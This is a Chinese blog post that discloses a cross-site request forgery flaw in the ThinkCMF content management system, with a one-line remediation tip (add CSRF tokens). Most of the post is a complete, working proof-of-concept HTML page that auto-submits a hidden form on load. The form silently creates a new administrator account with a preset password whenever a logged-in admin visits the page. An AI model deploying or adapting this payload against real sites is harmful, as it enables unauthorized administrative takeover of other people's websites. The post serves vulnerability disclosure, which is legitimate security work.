ThinkCMF存在CSRF漏洞可创建管理员账号

最新推荐文章于 2023-03-24 12:54:27 发布
最新推荐文章于 2023-03-24 12:54:27 发布
阅读量610 收藏 1
点赞数 2
分类专栏: PHP代码审计 文章标签: 渗透测试 代码审计 PHP代码审计 thinkCMF CSRF漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yun2diao/article/details/92573188
版权

thinkCMF官网: https://www.thinkcmf.com/

一、POC

当管理员登录后,打开包含以下内容的网页,就会自动创建一个管理员账号。
注:需要把url变量中的http://tp.im更改为安装时设置的域名。
以下内容保存为一个html网页,如test.html。

<html><body>
<script type="text/javascript">
function post(url, fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += " <input type=\"hidden\" name=\"user&#95;login\" value=\"CSRFadministrator\" />";
fields += " <input type=\"hidden\" name=\"user&#95;pass\" value=\"admin1234\" />";
fields += " <input type=\"hidden\" name=\"user&#95;email\" value=\"456&#64;bing&#46;com\" />";
fields += " <input type=\"hidden\" name=\"role&#95;id&#91;&#93;\" value=\"1\" />";

var url = "http://tp.im/admin/user/addpost.html";
post(url, fields);
}
window.onload = function(){csrf_hack();}
</script>
</body></html>

二、漏洞证明:

在这里插入图片描述修复建议:设置CSRF-token保护。

云雕
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header。鉴于种种原因,这三种方法都不是那么完美,各有利弊。在跨站请求伪造(CSRF)攻击里面,攻击者通过用户的浏览器来注入额外的网络请求,来破坏一个网站会话的完整性。而浏览器的安全策略是允许当前页面
hucart-含有CSRF漏洞的源码.zip
12-31
hucart-含有CSRF漏洞的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除
thinkcmf-ThinkCMFX-master
12-11
基于bootstrap开发的网站模板,可用于二次开发,内含丰富控件,界面完美大气。
espcms csrf漏洞 导致任意管理员添加1
08-03
漏洞简介:ESPCMSV6 是一套基于 LAMP 开发构建的企业网站管理系统。ESPCMS 后台添加管理员页面 缺少 token 导致 csrf 漏洞 可任意添
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 685
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
thinkadmin开源框架获取添加信息的主键id
向宇
01-08 439
注:该文章只是给有thinkadmin开发经验的人看的,如果你没有用过,可能会看不懂 执行一个添加方法 /** * 添加学生 * @auth true * @throws \think\Exception * @throws \think\db\exception\DataNotFoundException * @throws \think\db\exception\ModelNotFoundException * @throws \think\exception\DbException.
thinkcmf 渗透测试漏洞修复解决方案
网站安全资讯
11-20 968
近段时间发现很多APP程序用的是thinkcmf,此程序源码存在getshell漏洞,我们Sine安全紧急对此高危漏洞进行了分析和漏洞修复,攻击者可以通过构造特定的请求包get请求即可在远程服务器上执行任意脚本代码。 根据index.php中的配置,项目路径为application,打开 P...
ThinkCMF框架任意内容包含漏洞分析复现
0nc3的博客
11-09 2728
0x00 CMS简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间...
ThinkPHP 中防止表单重复提交(表单令牌)
zhangxy
01-17 1150
1、在conf文件下的config.php中添加: <?php return array( //'配置项'=>'配置值' 'TOKEN_ON' => true, // 是否开启令牌验证 默认关闭 'TOKEN_NAME' => '__hash__', // 令牌验证的表单隐藏字段名称,默认为__hash__ 'TOKEN
ThinkCMF框架手册
欢迎交流PHP和前端知识QQ:634487911
09-14 815
ThinkCMF :https://www.thinkcmf.com/docs/cmfx/ ThinkPHP3.2.3完全开发手册 :https://www.kancloud.cn/manual/thinkphp
CSRFTester:一款CSRF漏洞的安全测试工具
02-26
CSRFTester:一款CSRF漏洞的安全测试工具CSRFTester是一款CSRF漏洞的...一个简单的CSRF漏洞利用示例就是网站管理员在点击了某个外部连接的时候,在不知情的情况下在自己的网站中增加了一个不法者设置的账户。CSRFTest
CSRF漏洞的靶场实验
最新发布
09-19
靶场试炼
ThinkCMF thinkphp5.1 个人修改版本
写PHP的老王
01-27 2208
上一个项目在api上使用了thinkphp5.1,但是后台还是使用thinkcmf5.0,tp版本是5.0 .当时就想统一thinkphp版本。最近得空有时间修改,因此在ThinkCMF 5.0.180901基础上将thinkphp版本改成5.1.29 。修改后,已经对本地测试的不兼容进行修改。 ThinkCMF修改基础版本 ThinkCMF 5.0.180901 正式版 ThinkPHP版本 ...
ThinkCMF 5.1.0 发布:支持 swoole、协议变更为 MIT
weixin_34061555的博客
03-08 189
ThinkCMF5.1 做你的专属开发框架,让你更自由地飞 ThinkCMF5.1化繁为简,基于ThinkPHP 5.1重构所有核心代码 ,目标是做你的专属开发框架,让开发者更自由...
2020-09-29 ThinkCMF5.1点击菜单跳转界面
amy_victory的博客
09-29 705
第一次接触thinkcmf这个框架,有很多地方都不是很清楚。今天用这个框架实现前端中的页面跳转问题。我看了ThinkCMF的5.1的官方文档。现在来总结一下一个简单的跳转。需要在后台建立一个主菜单显示在前台来,点击不同菜单名跳转到不同界面。用的是自己的模板quick_start。 1、创建一个跳转的界面,创建的是company_profile.html和它的一个同名json文件。路径:public/themes/quick_start/portal/下这两个文件。 company_pr...
ThinkCMF5.1伪静态配置-Nginx
乌药ice
10-29 1187
1.域名绑定到/public 2.伪静态规则 location / { if (!-e $request_filename){ rewrite ^(.*)$ /index.php?s=$1 last; break; } } location ~ /.*\.php/ { rewrite ^(.*?/?)(.*\.php)(.*)$ /$2?s=$3 last; break; }
腾讯云服务器CentOS7.2安装宝塔搭建LNMP环境并安装ThinkCMF5.1框架
@Banana的博客
05-15 1379
多读多写多记录,多学多练多思考。----------- Banana.Banuit Gang(香柚帮) 购买了云服务器之后,想要正常的运行一个PHP或Java项目,首先第一步你得搭建一个运行这个项目的环境,就像你在电脑上进行本地开发一个PHP项目,你首先得安装Apache和MySQL,开发一个Java项目你得首先装一个JDK和Tomcat等等。 下边我们在CentOS7.2上边通过安装宝塔Li...
ThinkCMF X2.2.2多处SQL注入漏洞分析
weixin_33924770的博客
12-21 1766
  1.     漏洞描述 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。最近刚好在渗透测试项目中遇到这个CMS,便审了下源码发现多处SQL注入漏洞,在Github给项目方提issues后,提交到CVE官方后很快就拿到了分配的多个编号:CVE-2018-19894、CVE-2018...
CatfishCMS任意命令执行导致getshell
云雕的博客
06-08 4861
CatfishCMS任意命令执行导致getshell目录一、 漏洞说明二、 漏洞测试三、漏洞修复: 目录 测试环境:windows + php5.4.45 +apache (phpStudy 集成环境) CMS 版本: v4.8.54(发布于2019年1月) 一、 漏洞说明 完整的payload为: s=dir&_method=__construct&method=*&fi...
当前系统未对referer进行校验,存在csrf漏洞风险
07-14
您提到的CSRF(Cross-Site Request Forgery)漏洞是一种常见的Web应用程序安全漏洞,它利用了Web应用程序未对请求来源进行验证的问题。攻击者可以通过欺骗用户执行恶意操作,从而在用户不知情的情况下执行非授权的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值